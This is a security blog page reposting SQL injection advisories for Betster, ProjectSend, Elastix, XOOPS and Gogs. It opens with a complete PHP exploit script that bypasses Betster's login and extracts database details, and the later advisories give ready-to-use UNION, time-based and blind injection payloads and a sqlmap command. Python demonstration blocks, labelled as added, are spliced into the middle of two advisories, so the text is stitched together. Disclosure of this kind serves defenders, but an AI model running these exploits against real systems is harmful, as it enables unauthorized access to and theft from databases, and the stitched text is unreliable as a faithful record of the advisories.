MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

9Mar/15

Betster (PHP Betoffice) Authentication Bypass and SQL Injection

<?php
/*
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /        
  / XXXXXX /
 (________(          
  `------'
 
 Exploit Title   : Betster (PHP Betoffice) Authentication Bypass and SQL Injection
 Date            : 6 March 2015
 Exploit Author  : CWH Underground
 Discovered By   : ZeQ3uL
 Site            : www.2600.in.th
 Vendor Homepage : http://betster.sourceforge.net/
 Software Link   : http://downloads.sourceforge.net/project/betster/betster-1.0.4.zip
 Version         : 1.0.4
 Tested on       : Linux, PHP 5.3.9
 
####################
SOFTWARE DESCRIPTION
####################
 
Betster is software to create an online bet office based on PHP, MySQL and JavaScript. The system works with variable odds (betting exchange with variable decimal odds) and provides a CMS-like backend for handling the bets, users and categories.
 
################################################################
VULNERABILITY: SQL Injection (showprofile.php, categoryedit.php)
################################################################
 
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User-tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject their own SQL syntax and thus read, insert or delete database entries, or attack the underlying operating system, depending on the query, DBMS and configuration.
 
/showprofile.php (LINE: 63)
-----------------------------------------------------------------------------
if (($session->getState()) && 
        (($user->getStatus() == "administrator") || 
         ($user->getStatus() == "betmaster"))){
        $mainhtml = file_get_contents("tpl/showprofile.inc");
 
        $id = htmlspecialchars($_GET['id']);                            <<<< WTF !!
        $xuser = $db_mapper->getUserById($id);
-----------------------------------------------------------------------------
 
/categoryedit.php (LINE: 52)
-----------------------------------------------------------------------------
$id = htmlspecialchars($_GET['id']);                                    <<<< WTF !!
$action = htmlspecialchars($_GET['ac']);
----------------------------------------------------------------------------- 
 
###########################################
VULNERABILITY: Authentication Bypass (SQLi)
###########################################
 
File index.php (login function) has a SQL injection vulnerability: the "username" parameter, supplied as a POST parameter, is used for checking valid credentials.
The "username" parameter is not validated before being passed into the SQL query, which gives rise to an authentication bypass issue.
 
#####################################################
EXPLOIT
#####################################################
 
*/
 
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 50);
 
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
 
    fputs($sock, $packet);
    return stream_get_contents($sock);
}
 
print "\n+---------------------------------------------+";
print "\n| Betster Auth Bypass & SQL Injection Exploit |";
print "\n+---------------------------------------------+\n";
 
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /betster/\n";
    die();
}
 
$host = $argv[1];
$path = $argv[2];
 
$payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN";
 
$packet  = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
 
   print "\n  ,--^----------,--------,-----,-------^--,   \n";
   print "  | |||||||||   `--------'     |          O   \n";
   print "  `+---------------------------^----------|   \n";
   print "    `\_,-------, _________________________|   \n";
   print "      / XXXXXX /`|     /                      \n";
   print "     / XXXXXX /  `\   /                       \n";
   print "    / XXXXXX /\______(                        \n";
   print "   / XXXXXX /                                 \n";
   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
   print " (________(                                   \n";
   print "  `------'                                    \n";
 
$response = http_send($host, $packet);
 
 if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
 
$packet  = "POST {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
 
   print "\n\n[+] Bypassing Authentication...\n";
   sleep(2);
 
$response=http_send($host, $packet);
 
preg_match('/menutitle">ADMIN/s', $response) ? print "\n[+] Authentication Bypass Successfully !!\n" : die("\n[-] Bypass Authentication Failed !!\n");
 
$packet  = "GET {$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+ HTTP/1.0\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
 
   print "[+] Performing SQL Injection Attack\n";
   sleep(2);
 
$response1=http_send($host, $packet);
 
preg_match('/::(.*)::/', $response1, $m) ? print "\n$m[1]\n" : die("\n[-] Exploit failed!\n");
 
################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>


7Mar/15

ProjectSend r561 SQL Injection

#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/download/67/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n.le@itas.vn) & ITAS Team (www.itas.vn)
 
 
::PROOF OF CONCEPT::
 
+ REQUEST:
GET /projectsend/users-edit.php?id=<SQL INJECTION HERE> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456;
PHPSESSID=jec50hu4plibu5p2p6hnvpcut6
Connection: keep-alive
 
 
- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code: 
if (isset($_GET['id'])) {
  $client_id = mysql_real_escape_string($_GET['id']);
  /**
   * Check if the id corresponds to a real client.
   * Return 1 if true, 2 if false.
   **/
  $page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
  /**
   * Return 0 if the id is not set.
   */
  $page_status = 0;
}
 
/**
 * Get the clients information from the database to use on the form.
 */
if ($page_status === 1) {
  $editing = $database->query("SELECT * FROM tbl_users WHERE id=$client_id");
  while($data = mysql_fetch_array($editing)) {
    $add_client_data_name = $data['name'];
    $add_client_data_user = $data['user'];
    $add_client_data_email = $data['email'];
    $add_client_data_addr = $data['address'];
    $add_client_data_phone = $data['phone'];
    $add_client_data_intcont = $data['contact'];
    if ($data['notify'] == 1) { $add_client_data_notity = 1; } else { $add_client_data_notity = 0; }
    if ($data['active'] == 1) { $add_client_data_active = 1; } else { $add_client_data_active = 0; }
  }
}
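The two PHP snippets above (Betster's htmlspecialchars() on a quoted id in showprofile.php, ProjectSend's mysql_real_escape_string() on an unquoted numeric id in client-edit.php) fail for the same reason: the escaping is for the wrong context. The following added example, which is not code from either project, reproduces both failures against a constructed in-memory SQLite table and shows the type-checked, parameterized lookup that fixes them; the two escape helpers are simplified Python imitations of the PHP functions, assumed to match PHP 5.3's default behaviour.

```python
import re
import sqlite3


def htmlspecialchars_compat(s: str) -> str:
    """Imitation of PHP's htmlspecialchars() with its pre-8.1 default flags
    (ENT_COMPAT): &, <, > and double quotes are encoded, single quotes are NOT.
    Assumption: this mirrors the PHP 5.3 build the Betster advisory was tested on."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def mysql_real_escape_string(s: str) -> str:
    """Imitation of MySQL's string escaping: backslash-escapes the characters
    that would terminate a quoted string literal. It changes nothing for a
    value that is spliced into the query unquoted (a bare number)."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in s)


def make_db() -> sqlite3.Connection:
    # Constructed sample rows standing in for Betster's user table / ProjectSend's tbl_users.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_users (id INTEGER PRIMARY KEY, user TEXT, email TEXT)")
    conn.executemany("INSERT INTO tbl_users VALUES (?, ?, ?)", [
        (1, "admin", "admin@example.invalid"),
        (2, "alice", "alice@example.invalid"),
        (3, "bob", "bob@example.invalid"),
    ])
    return conn


def betster_style_lookup(conn, raw_id: str) -> list:
    """Quoted-string context with HTML-escaped input: the pattern from showprofile.php.
    A single quote passes htmlspecialchars() untouched and closes the literal."""
    escaped = htmlspecialchars_compat(raw_id)
    return conn.execute(f"SELECT id, user FROM tbl_users WHERE id = '{escaped}'").fetchall()


def projectsend_style_lookup(conn, raw_id: str) -> list:
    """Unquoted numeric context with SQL-string-escaped input: the pattern from
    client-edit.php. No quote is needed, so there is nothing for the escaper to do."""
    escaped = mysql_real_escape_string(raw_id)
    return conn.execute(f"SELECT id, user FROM tbl_users WHERE id={escaped}").fetchall()


def safe_lookup(conn, raw_id: str) -> list:
    """Hardened form: validate the expected type first, then bind the value as a
    parameter so the database never parses it as SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []  # reject anything that is not a plain numeric id
    return conn.execute("SELECT id, user FROM tbl_users WHERE id = ?", (int(raw_id),)).fetchall()


def demo() -> dict:
    """Row counts for a benign id and for the tautology the Betster exploit uses
    ("' or 'a'='a"), which widens the WHERE clause instead of selecting one row."""
    conn = make_db()
    return {
        "betster_benign": len(betster_style_lookup(conn, "2")),
        "betster_tautology": len(betster_style_lookup(conn, "2' OR 'a'='a")),
        "projectsend_benign": len(projectsend_style_lookup(conn, "2")),
        "projectsend_tautology": len(projectsend_style_lookup(conn, "2 OR 1=1")),
        "safe_benign": len(safe_lookup(conn, "2")),
        "safe_rejects_quote": len(safe_lookup(conn, "2' OR 'a'='a")),
        "safe_rejects_or": len(safe_lookup(conn, "2 OR 1=1")),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:24} -> {rows} row(s)")
```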
 
 
::DISCLOSURE::
+ 01/06/2015: Detect vulnerability
+ 01/07/2015: Contact to vendor
+ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply
+ 03/05/2015: Public information
 
::REFERENCE::
-
http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in-projectsend-r561-76.html
 
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
 
Best Regards,
---------------------------------------------------------------------
ITAS Team (www.itas.vn)


7Mar/15

Elastix 2.5.0 SQL Injection

# Title: Elastix v2.x Blind SQL Injection Vulnerability
# Author: Ahmed Aboul-Ela
# Twitter: https://twitter.com/aboul3la
# Vendor : http://www.elastix.org
# Version: v2.5.0 and prior versions should be affected too
 
- Vulnerable Source Code snippet in "a2billing/customer/iridium_threed.php":
 
  <?php
  [...]
  line 5: getpost_ifset (array('transactionID', 'sess_id', 'key', 'mc_currency', 'currency', 'md5sig', 
  'merchant_id', 'mb_amount', 'status','mb_currency','transaction_id', 'mc_fee', 'card_number'));
 
  line 34: $QUERY = "SELECT id, cardid, amount, vat, paymentmethod, cc_owner, cc_number, cc_expires, 
  creationdate, status, cvv, credit_card_type,currency, item_id, item_type " . 
  " FROM cc_epayment_log " . " WHERE id = ".$transactionID;
 
  line 37: $transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
  [...]
  ?>    
 
   The GET parameter transactionID was used directly in the SQL query
   without any sanitization, which leads directly to a SQL injection vulnerability.
 
- Proof of Concept: 
 
  http://[host]/a2billing/customer/iridium_threed.php?transactionID=-1 and 1=benchmark(2000000,md5(1))
 
  The backend response will be delayed for a few seconds, which means the benchmark() function was executed successfully.
 
- Mitigation:
 
   The vendor has released a fix for the vulnerability. It is strongly recommended to update your elastix server now
 
   [~] yum update elastix-a2billing
 
 
- Time-Line:
 
    Sat, Feb 14, 2015 at 2:19 PM: Vulnerability report sent to Elastix
    Wed, Feb 18, 2015 at 4:29 PM: Confirmation of the issue from Elastix
    Fri, Mar  6, 2015 at 8:39 PM: Elastix released a fix for the vulnerability
    Sat, Mar  7, 2015 at 5:15 PM: The public responsible disclosure
 
- Credits:
 
    Ahmed Aboul-Ela - Cyber Security Analyst @ EG-CERT


18Nov/14

XOOPS 2.5.6 SQL Injection

=============================================
MGC ALERT 2014-003
- Original release date: March 6, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in XOOPS <= 2.5.6
 
II. BACKGROUND
-------------------------
XOOPS is an acronym of "eXtensible Object Oriented Portal System". Though
started as a portal system, it later developed into a web application
framework. It aims to serve as a web framework for use by small, medium and
large sites, through the installation of modules.
 
III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variable "selgroups" on the page
"admin.php". This bug was found using the portal with authentication. To
exploit the vulnerability it is only necessary to use version 1.0 of the HTTP
protocol to interact with the application.
 
IV. PROOF OF CONCEPT
-------------------------
The following URLs and parameters have been confirmed to suffer from
Blind SQL injection.
 
/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1
 
Exploiting with SQLMap:
 
python sqlmap.py -u "http://192.168.244.129/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1" --cookie="PHPSESSID=kjrjempn828cgrv6k8tjp4fs60;xoops_user=0" -p "selgroups" --technique=TB --dbs
 
[INFO] POST parameter 'selgroups' is 'MySQL > 5.0.11 AND time-based blind (comment)' injectable
[INFO] POST parameter 'selgroups' is 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
 
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[INFO] fetching database names
[INFO] fetching number of databases
[INFO] resumed: 4
[INFO] resumed: information_schema
[INFO] resumed: mysql
[INFO] resumed: phpmyadmin
[INFO] resumed: xoops
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] xoops
 
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
 
VI. SYSTEMS AFFECTED
-------------------------
XOOPS <= 2.5.6
 
VII. SOLUTION
-------------------------
Update to version 2.5.7
 
VIII. REFERENCES
-------------------------
http://xoops.org/
http://xoops.org/modules/news/article.php?storyid=6658
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
 
XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Send to vendor
June 17, 2014 3: New version that includes patched code
http://xoops.org/modules/news/article.php?storyid=6658
November 18, 2014 4: Sent to lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester


16Nov/14

Gogs Repository Search SQL Injection

Unauthenticated SQL Injection in Gogs repository search
=======================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs (Go Git Service) is a painless self-hosted Git Service written in Go. (taken from [1])
 
It is very similar to the GitHub hosting platform. Multiple users can create multiple repositories and share code with others with the git version control system. Repositories can be marked as public or private to prevent access from unauthorized users.
 
Gogs provides an API view to give JavaScript code the possibility to search for existing repositories in the system. This view is accessible at /api/v1/repos/search?q=<search query>.
 
The q parameter of this view is vulnerable to SQL injection.
 
 
Exploitation Technique
======================
Remote
 
 
Severity Level
==============
Critical
 
 
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8682
 
Impact
======
The vulnerability results at least in a complete compromise of the database. Depending on the particular database configuration a compromise of the system is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/repo.go:
[...]
// SearchRepositoryByName returns given number of repositories whose name contains keyword.
func SearchRepositoryByName(opt SearchOption) (repos []*Repository, err error) {
    // Prevent SQL inject.
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return repos, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)
 
    repos = make([]*Repository, 0, opt.Limit)
 
    // Append conditions.
    sess := x.Limit(opt.Limit)
    if opt.Uid > 0 {
        sess.Where("owner_id=?", opt.Uid)
    }
    if !opt.Private {
        sess.And("is_private=false")
    }
    sess.And("lower_name like '%" + opt.Keyword + "%'").Find(&repos)
    return repos, err
}
[...]
 
The vulnerability exists because of a string concatenation in the SQL query with user-supplied data. Because of the SQL filter at the method entry, attackers can't use spaces (0x20), and since v0.5.6.1025-g83283b commas are also filtered.
 
 
Proof of Concept
================
Request:
http://www.example.com/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09
(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09
user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)
%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09
as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as
%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09
a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09
JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN
%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN
%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN
%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN
%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN
%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
 
Response:
{"data":[{"repolink":"bluec0re/test"},{"repolink":"bluec0re/secret"},{"repolink":"bluec0re/root@localhost"}],"ok":true}
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
sess.And("lower_name like ?", "%" + opt.Keyword + "%").Find(&repos)
 
Update to version 0.5.6.1105.
 
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1402.txt
 
 
Advisory-ID
===========
BC-1402
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 
 
Unauthenticated SQL Injection in Gogs user search
=================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs (Go Git Service) is a painless self-hosted Git Service written in Go. (taken from [1])
 
It is very similar to the GitHub hosting platform. Multiple users can create multiple repositories and share code with others with the git version control system. Repositories can be marked as public or private to prevent access from unauthorized users.
 
Gogs provides an API view to give JavaScript code the possibility to search for existing users in the system. This view is accessible at /api/v1/users/search?q=<search query>.
 
The q parameter of this view is vulnerable to SQL injection.
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Critical
 
 
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8682
 
 
Impact
======
The vulnerability results at least in a complete compromise of the database. Depending on the particular database configuration a compromise of the system is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/user.go:
[...]
// SearchUserByName returns given number of users whose name contains keyword.
func SearchUserByName(opt SearchOption) (us []*User, err error) {
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return us, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)
 
    us = make([]*User, 0, opt.Limit)
    err = x.Limit(opt.Limit).Where("type=0").And("lower_name like '%" + opt.Keyword + "%'").Find(&us)
    return us, err
}
[...]
 
The vulnerability exists because of a string concatenation in the SQL query with user-supplied data. Because of the SQL filter at the method entry, attackers can't use spaces (0x20), and since v0.5.6.1025-g83283b commas are also filtered.
 
 
Proof of Concept
================
Request:
http://www.example.com/api/v1/users/search?q='/**/and/**/false)/**/union/**/
select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from
/**/mysql.db/**/where/**/('%25'%3D'
 
Response:
{"data":[{"username":"5.5.40-0ubuntu0.14.04.1","avatar":"//1.gravatar.com/avatar/"}],"ok":true}
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
err = x.Limit(opt.Limit).Where("type=0").And("lower_name like ?", "%" + opt.Keyword + "%").Find(&us)
 
Update to version 0.5.6.1105.
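The string concatenation in both Gogs search functions above (SearchRepositoryByName and SearchUserByName) and the prepared-statement fix the two advisories propose, as an added example run against a constructed in-memory SQLite table; this is not Gogs code. The filter_sql_inject() stand-in only reproduces the two restrictions the text mentions (spaces and commas stripped), because the real FilterSQLInject is not shown here, and the sample repositories are constructed. The last function also adds the LIKE-wildcard escaping that parameter binding alone does not give you.

```python
import sqlite3


def filter_sql_inject(keyword: str) -> str:
    """Stand-in for the blacklist the advisories describe: spaces and commas
    removed. Assumption: Gogs' real FilterSQLInject is not on the page, so this
    only models the two restrictions the text names."""
    return keyword.replace(" ", "").replace(",", "")


def make_db() -> sqlite3.Connection:
    # Constructed sample rows standing in for Gogs' repository table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE repository (id INTEGER PRIMARY KEY, lower_name TEXT, is_private INTEGER)")
    conn.executemany("INSERT INTO repository VALUES (?, ?, ?)", [
        (1, "test", 0), (2, "secret", 1), (3, "my_tool", 0), (4, "notes", 0)])
    return conn


def search_concat(conn, keyword: str) -> list:
    """The vulnerable shape from SearchRepositoryByName: blacklist, lowercase,
    then splice the keyword straight into the LIKE pattern."""
    kw = filter_sql_inject(keyword).lower()
    sql = "SELECT lower_name FROM repository WHERE is_private=0 AND lower_name LIKE '%" + kw + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_param(conn, keyword: str) -> list:
    """The fix from the advisories: bind the whole pattern as a parameter, so the
    database receives the keyword as data and never parses it as SQL."""
    kw = keyword.lower()
    sql = "SELECT lower_name FROM repository WHERE is_private=0 AND lower_name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + kw + "%",))]


def like_escape(s: str) -> str:
    """Neutralise LIKE metacharacters so user text is matched literally."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_param_literal(conn, keyword: str) -> list:
    """Parameter binding plus wildcard escaping: binding stops SQL injection,
    ESCAPE stops a keyword such as '_' or '%' from acting as a wildcard."""
    kw = like_escape(keyword.lower())
    sql = "SELECT lower_name FROM repository WHERE is_private=0 AND lower_name LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + kw + "%",))]


def demo() -> dict:
    """Repository names returned by each variant for a benign keyword, for the
    tab-separated input of the kind the advisory's PoC uses, and for a lone '_'."""
    conn = make_db()
    # The blacklist strips 0x20, but SQL accepts tabs (the request above uses
    # %09), so the is_private=0 condition is simply ORed away. Constructed input.
    injected = "'\tor\t'%'='"
    return {
        "concat_benign": search_concat(conn, "test"),
        "concat_injected": search_concat(conn, injected),   # private repo leaks
        "param_benign": search_param(conn, "test"),
        "param_injected": search_param(conn, injected),     # matched literally: nothing
        "param_wildcard": search_param(conn, "_"),          # '_' matches any one char
        "param_literal": search_param_literal(conn, "_"),   # only names with a real '_'
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:18} -> {rows}")
```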
 
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1403.txt
 
 
Advisory-ID
===========
BC-1403
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 
--
Timo Schmid
 
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
 
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
 
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================


15Nov/14

Gogs Label Search Blind SQL Injection

 
Blind SQL Injection in Gogs label search
========================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs (Go Git Service) is a painless self-hosted Git Service written in Go. (taken from [1])
 
It is very similar to the GitHub hosting platform. Multiple users can create multiple repositories and share code with others with the git version control system. Repositories can be marked as public or private to prevent access from unauthorized users.
 
Gogs provides a view to filter issues by labels. This view is accessible at /<username>/<repository>/issues?labels=&type=&state=
 
The labels parameter of this view is vulnerable to a blind SQL injection.
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Critical
 
 
CVSS Base Score
===============
6.6 (AV:N / AC:H / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8681
 
 
Impact
======
The vulnerability results at least in a complete compromise of the database. Depending on the particular database configuration a compromise of the system is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/issue.go:
[...]
// GetIssues returns a list of issues by given conditions.
func GetIssues(uid, rid, pid, mid int64, page int, isClosed bool, labelIds, sortType string) ([]Issue, error) {
    sess := x.Limit(20, (page-1)*20)
 
    if rid > 0 {
        sess.Where("repo_id=?", rid).And("is_closed=?", isClosed)
    } else {
        sess.Where("is_closed=?", isClosed)
    }
 
    if uid > 0 {
        sess.And("assignee_id=?", uid)
    } else if pid > 0 {
        sess.And("poster_id=?", pid)
    }
 
    if mid > 0 {
        sess.And("milestone_id=?", mid)
    }
 
    if len(labelIds) > 0 {
        for _, label := range strings.Split(labelIds, ",") {
            sess.And("label_ids like '%$" + label + "|%'")
        }
    }
[...]
 
The vulnerability exists because of a string concatenation in the SQL query with user-supplied data. An attacker is restricted to not using commas in the injection string, as the program splits the input at commas.
 
 
Proof of Concept
================
Test of version string contains at least 10 characters:
http://www.example.com/user/repos/issues?label=' or
char_length(@@version) > 10
and '|%'='&type=all&state=
 
Returns all issues if true, none if false.
 
This could be used to extract data with a binary search.
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
sess.And("label_ids like ?", "%$" + label + "|%")
 
Update to Version 0.5.6.1025.
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1024-gf1d8746
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-10-25: Fixed by ensuring datatype of user input
